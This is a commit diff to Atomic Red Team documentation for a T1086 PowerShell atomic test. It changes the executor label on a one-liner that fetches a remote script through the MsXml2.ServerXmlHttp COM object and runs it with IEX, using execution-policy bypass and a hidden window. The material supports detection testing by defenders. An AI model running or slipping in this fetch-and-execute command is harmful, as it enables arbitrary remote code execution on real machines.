Generate docs from job=validate_atomics_generate_docs branch=PowerShell-Executor.Command-Properties

This commit is contained in:
CircleCI Atomic Red Team doc generator
2018-09-05 18:58:23 +00:00
parent 165ab03d68
commit 36b00a7d20
+2 -2
View File
@@ -165,9 +165,9 @@ Not proxy aware removing cache although does not appear to write to those locati
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
#### Run it with `powershell`!
#### Run it with `command_prompt`!
```
IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
<br/>
<br/>